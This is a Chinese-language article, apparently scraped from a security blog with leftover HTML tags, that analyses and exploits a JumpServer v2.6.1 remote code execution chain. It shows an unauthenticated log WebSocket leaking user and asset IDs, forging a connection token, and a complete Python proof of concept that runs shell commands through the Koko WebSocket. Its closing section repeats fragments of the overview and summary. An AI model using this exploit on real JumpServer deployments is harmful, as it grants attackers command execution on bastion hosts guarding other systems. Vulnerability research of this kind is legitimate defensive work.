JumpServer远程代码执行漏洞分析与利用<\/h1>

漏洞概述<\/h2>
本漏洞存在于JumpServer开源堡垒机系统中，涉及未授权访问和远程代码执行风险。漏洞组合利用了WebSocket未授权访问和认证令牌生成机制缺陷，最终可导致攻击者在目标系统上执行任意命令。<\/p>

环境搭建<\/h2>

下载JumpServer V2.6.1安装包：<\/p>

安装脚本：https:\/\/www.o2oxy.cn\/wp-content\/uploads\/2021\/01\/quick_start.zip<\/li>
安装时注意选择"no"选项<\/li> <\/ul> <\/li>

安装完成后启动服务：<\/p>

cd \/opt\/jumpserver-installer-v2.6.1\/
.\/jms start
<\/code><\/pre>
<\/li>

访问Web界面：<\/p>

默认账号：admin\/admin<\/li>
首次登录后需修改密码<\/li>
<\/ul>
<\/li>

添加测试主机并配置Web终端<\/p>
<\/li>
<\/ol>
漏洞分析<\/h2>
1. 未授权WebSocket访问<\/h3>
漏洞点位于apps\/ops\/ws.py<\/code>中的CeleryLogWebsocket<\/code>类，该WebSocket端点未进行身份验证：<\/p>
class<\/span> CeleryLogWebsocket<\/span>(JsonWebsocketConsumer):
<\/span><\/span>    disconnected =<\/span> False<\/span>
<\/span><\/span>    
<\/span><\/span>    def<\/span> connect<\/span>(self):
<\/span><\/span>        self.<\/span>accept()
<\/span><\/span><\/code><\/pre>攻击者可直接连接此WebSocket端点获取日志信息。<\/p>
2. 敏感信息泄露<\/h3>
通过未授权WebSocket可获取jumpserver.log<\/code>中的敏感信息，包括：<\/p>

用户ID<\/li>
用户名<\/li>
资产ID<\/li>
主机名<\/li>
系统用户ID<\/li>
<\/ul>
示例日志格式：<\/p>
{
<\/span><\/span>    "user"<\/span>: "4320ce47-e0e0-4b86-adb1-675ca611ea0c"<\/span>,
<\/span><\/span>    "username"<\/span>: "test2"<\/span>,
<\/span><\/span>    "asset"<\/span>: "ccb9c6d7-6221-445e-9fcc-b30c95162825"<\/span>,
<\/span><\/span>    "hostname"<\/span>: "192.168.1.73"<\/span>,
<\/span><\/span>    "system_user"<\/span>: "79655e4e-1741-46af-a793-fff394540a52"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. 认证令牌生成机制<\/h3>
认证API位于\/api\/v1\/authentication\/connection-token\/<\/code>，代码逻辑如下：<\/p>
class<\/span> UserConnectionTokenApi<\/span>(RootOrgViewMixin, APIView):
<\/span><\/span>    def<\/span> post<\/span>(self, request):
<\/span><\/span>        user_id =<\/span> request.<\/span>data.<\/span>get('user'<\/span>, ''<\/span>)
<\/span><\/span>        asset_id =<\/span> request.<\/span>data.<\/span>get('asset'<\/span>, ''<\/span>)
<\/span><\/span>        system_user_id =<\/span> request.<\/span>data.<\/span>get('system_user'<\/span>, ''<\/span>)
<\/span><\/span>        token =<\/span> str(uuid.<\/span>uuid4())
<\/span><\/span>        user =<\/span> get_object_or_404(User, id=<\/span>user_id)
<\/span><\/span>        asset =<\/span> get_object_or_404(Asset, id=<\/span>asset_id)
<\/span><\/span>        system_user =<\/span> get_object_or_404(SystemUser, id=<\/span>system_user_id)
<\/span><\/span>        value =<\/span> {
<\/span><\/span>            'user'<\/span>: user_id,
<\/span><\/span>            'username'<\/span>: user.<\/span>username,
<\/span><\/span>            'asset'<\/span>: asset_id,
<\/span><\/span>            'hostname'<\/span>: asset.<\/span>hostname,
<\/span><\/span>            'system_user'<\/span>: system_user_id,
<\/span><\/span>            'system_user_name'<\/span>: system_user.<\/span>name
<\/span><\/span>        }
<\/span><\/span>        cache.<\/span>set(token, value, timeout=<\/span>20<\/span>)
<\/span><\/span>        return<\/span> Response({"token"<\/span>: token}, status=<\/span>201<\/span>)
<\/span><\/span><\/code><\/pre>4. Koko组件代码执行<\/h3>
后端Koko组件处理WebSocket连接时未充分验证令牌有效性：<\/p>
func<\/span> (s<\/span> *<\/span>server<\/span>) processTokenWebsocket<\/span>(ctx<\/span> *<\/span>gin<\/span>.Context<\/span>) {
<\/span><\/span>    tokenId<\/span>, _<\/span> :=<\/span> ctx<\/span>.GetQuery<\/span>("target_id"<\/span>)
<\/span><\/span>    tokenUser<\/span> :=<\/span> service<\/span>.GetTokenAsset<\/span>(tokenId<\/span>)
<\/span><\/span>    if<\/span> tokenUser<\/span>.UserID<\/span> ==<\/span> ""<\/span> {
<\/span><\/span>        logger<\/span>.Errorf<\/span>("Token is invalid: %s"<\/span>, tokenId<\/span>)
<\/span><\/span>        ctx<\/span>.AbortWithStatus<\/span>(http<\/span>.StatusBadRequest<\/span>)
<\/span><\/span>        return<\/span>
<\/span><\/span>    }
<\/span><\/span>    \/\/ 省略后续处理...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞利用步骤<\/h2>
1. 获取认证令牌<\/h3>
使用从日志中提取的信息构造POST请求获取临时令牌：<\/p>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>data =<\/span> {
<\/span><\/span>    "user"<\/span>: "4320ce47-e0e0-4b86-adb1-675ca611ea0c"<\/span>,
<\/span><\/span>    "asset"<\/span>: "ccb9c6d7-6221-445e-9fcc-b30c95162825"<\/span>,
<\/span><\/span>    "system_user"<\/span>: "79655e4e-1741-46af-a793-fff394540a52"<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>url =<\/span> 'http:\/\/192.168.1.73:8080\/api\/v1\/users\/connection-token\/?user-only=1'<\/span>
<\/span><\/span>response =<\/span> requests.<\/span>post(url, json=<\/span>data).<\/span>json()
<\/span><\/span>token =<\/span> response['token'<\/span>]
<\/span><\/span>print(token)
<\/span><\/span><\/code><\/pre>2. 建立WebSocket连接执行命令<\/h3>
使用获取的令牌建立WebSocket连接并执行命令：<\/p>
import<\/span> asyncio
<\/span><\/span>import<\/span> websockets
<\/span><\/span>import<\/span> json
<\/span><\/span>
<\/span><\/span>async<\/span> def<\/span> execute_command<\/span>(token, cmd):
<\/span><\/span>    target =<\/span> f<\/span>"ws:\/\/192.168.1.73:8080\/koko\/ws\/token\/?target_id=<\/span>{<\/span>token}<\/span>"<\/span>
<\/span><\/span>    
<\/span><\/span>    async<\/span> with<\/span> websockets.<\/span>connect(target) as<\/span> websocket:
<\/span><\/span>        # 接收初始消息获取ID<\/span>
<\/span><\/span>        recv_text =<\/span> await<\/span> websocket.<\/span>recv()
<\/span><\/span>        resws =<\/span> json.<\/span>loads(recv_text)
<\/span><\/span>        ws_id =<\/span> resws['id'<\/span>]
<\/span><\/span>        
<\/span><\/span>        # 初始化终端<\/span>
<\/span><\/span>        init_data =<\/span> {
<\/span><\/span>            "id"<\/span>: ws_id,
<\/span><\/span>            "type"<\/span>: "TERMINAL_INIT"<\/span>,
<\/span><\/span>            "data"<\/span>: "{<\/span>\"<\/span>cols<\/span>\"<\/span>:164, <\/span>\"<\/span>rows<\/span>\"<\/span>:17}"<\/span>
<\/span><\/span>        }
<\/span><\/span>        await<\/span> websocket.<\/span>send(json.<\/span>dumps(init_data))
<\/span><\/span>        
<\/span><\/span>        # 发送命令<\/span>
<\/span><\/span>        cmd_data =<\/span> {
<\/span><\/span>            "id"<\/span>: ws_id,
<\/span><\/span>            "type"<\/span>: "TERMINAL_DATA"<\/span>,
<\/span><\/span>            "data"<\/span>: cmd +<\/span> "<\/span>\r\n<\/span>"<\/span>
<\/span><\/span>        }
<\/span><\/span>        await<\/span> websocket.<\/span>send(json.<\/span>dumps(cmd_data))
<\/span><\/span>        
<\/span><\/span>        # 接收命令输出<\/span>
<\/span><\/span>        for<\/span> _ in<\/span> range(20<\/span>):
<\/span><\/span>            output =<\/span> await<\/span> websocket.<\/span>recv()
<\/span><\/span>            print(json.<\/span>loads(output)['data'<\/span>])
<\/span><\/span>
<\/span><\/span># 使用示例<\/span>
<\/span><\/span>token =<\/span> "获取的令牌"<\/span>
<\/span><\/span>asyncio.<\/span>get_event_loop().<\/span>run_until_complete(execute_command(token, "whoami"<\/span>))
<\/span><\/span><\/code><\/pre>完整漏洞利用POC<\/h2>
import<\/span> asyncio
<\/span><\/span>import<\/span> websockets
<\/span><\/span>import<\/span> requests
<\/span><\/span>import<\/span> json
<\/span><\/span>
<\/span><\/span>def<\/span> get_token<\/span>():
<\/span><\/span>    data =<\/span> {
<\/span><\/span>        "user"<\/span>: "4320ce47-e0e0-4b86-adb1-675ca611ea0c"<\/span>,
<\/span><\/span>        "asset"<\/span>: "ccb9c6d7-6221-445e-9fcc-b30c95162825"<\/span>,
<\/span><\/span>        "system_user"<\/span>: "79655e4e-1741-46af-a793-fff394540a52"<\/span>
<\/span><\/span>    }
<\/span><\/span>    url =<\/span> 'http:\/\/192.168.1.73:8080\/api\/v1\/users\/connection-token\/?user-only=1'<\/span>
<\/span><\/span>    response =<\/span> requests.<\/span>post(url, json=<\/span>data).<\/span>json()
<\/span><\/span>    return<\/span> response['token'<\/span>]
<\/span><\/span>
<\/span><\/span>async<\/span> def<\/span> exploit<\/span>(cmd):
<\/span><\/span>    token =<\/span> get_token()
<\/span><\/span>    print(f<\/span>"Obtained token: <\/span>{<\/span>token}<\/span>"<\/span>)
<\/span><\/span>    
<\/span><\/span>    target =<\/span> f<\/span>"ws:\/\/192.168.1.73:8080\/koko\/ws\/token\/?target_id=<\/span>{<\/span>token}<\/span>"<\/span>
<\/span><\/span>    
<\/span><\/span>    async<\/span> with<\/span> websockets.<\/span>connect(target) as<\/span> websocket:
<\/span><\/span>        # 获取会话ID<\/span>
<\/span><\/span>        recv_text =<\/span> await<\/span> websocket.<\/span>recv()
<\/span><\/span>        resws =<\/span> json.<\/span>loads(recv_text)
<\/span><\/span>        ws_id =<\/span> resws['id'<\/span>]
<\/span><\/span>        
<\/span><\/span>        # 初始化终端<\/span>
<\/span><\/span>        init_data =<\/span> {
<\/span><\/span>            "id"<\/span>: ws_id,
<\/span><\/span>            "type"<\/span>: "TERMINAL_INIT"<\/span>,
<\/span><\/span>            "data"<\/span>: "{<\/span>\"<\/span>cols<\/span>\"<\/span>:164, <\/span>\"<\/span>rows<\/span>\"<\/span>:17}"<\/span>
<\/span><\/span>        }
<\/span><\/span>        await<\/span> websocket.<\/span>send(json.<\/span>dumps(init_data))
<\/span><\/span>        
<\/span><\/span>        # 发送命令<\/span>
<\/span><\/span>        cmd_data =<\/span> {
<\/span><\/span>            "id"<\/span>: ws_id,
<\/span><\/span>            "type"<\/span>: "TERMINAL_DATA"<\/span>,
<\/span><\/span>            "data"<\/span>: cmd +<\/span> "<\/span>\r\n<\/span>"<\/span>
<\/span><\/span>        }
<\/span><\/span>        await<\/span> websocket.<\/span>send(json.<\/span>dumps(cmd_data))
<\/span><\/span>        
<\/span><\/span>        # 接收输出<\/span>
<\/span><\/span>        for<\/span> _ in<\/span> range(20<\/span>):
<\/span><\/span>            output =<\/span> await<\/span> websocket.<\/span>recv()
<\/span><\/span>            output_data =<\/span> json.<\/span>loads(output)
<\/span><\/span>            if<\/span> 'data'<\/span> in<\/span> output_data:
<\/span><\/span>                print(output_data['data'<\/span>])
<\/span><\/span>
<\/span><\/span># 执行命令示例<\/span>
<\/span><\/span>asyncio.<\/span>get_event_loop().<\/span>run_until_complete(exploit("whoami && ifconfig"<\/span>))
<\/span><\/span><\/code><\/pre>修复建议<\/h2>

对所有WebSocket端点实施身份验证<\/li>
加强日志中的敏感信息过滤<\/li>
令牌生成API增加严格的权限检查<\/li>
Koko组件应验证令牌的有效性和权限<\/li>
更新到JumpServer最新版本<\/li>
<\/ol>
总结<\/h2>
该漏洞利用链展示了从信息泄露到远程代码执行的完整路径，强调了堡垒机系统安全的重要性。通过组合多个看似小的问题，攻击者最终可获得系统控制权，因此系统设计时应实施纵深防御策略。<\/p>

JumpServer远程代码执行漏洞分析与利用<\/h1>

漏洞概述<\/h2> 本漏洞存在于JumpServer开源堡垒机系统中，涉及未授权访问和远程代码执行风险。漏洞组合利用了WebSocket未授权访问和认证令牌生成机制缺陷，最终可导致攻击者在目标系统上执行任意命令。<\/p>

漏洞分析<\/h2>

漏洞利用步骤<\/h2>

总结<\/h2> 该漏洞利用链展示了从信息泄露到远程代码执行的完整路径，强调了堡垒机系统安全的重要性。通过组合多个看似小的问题，攻击者最终可获得系统控制权，因此系统设计时应实施纵深防御策略。<\/p>

漏洞概述<\/h2>
本漏洞存在于JumpServer开源堡垒机系统中，涉及未授权访问和远程代码执行风险。漏洞组合利用了WebSocket未授权访问和认证令牌生成机制缺陷，最终可导致攻击者在目标系统上执行任意命令。<\/p>

总结<\/h2>
该漏洞利用链展示了从信息泄露到远程代码执行的完整路径，强调了堡垒机系统安全的重要性。通过组合多个看似小的问题，攻击者最终可获得系统控制权，因此系统设计时应实施纵深防御策略。<\/p>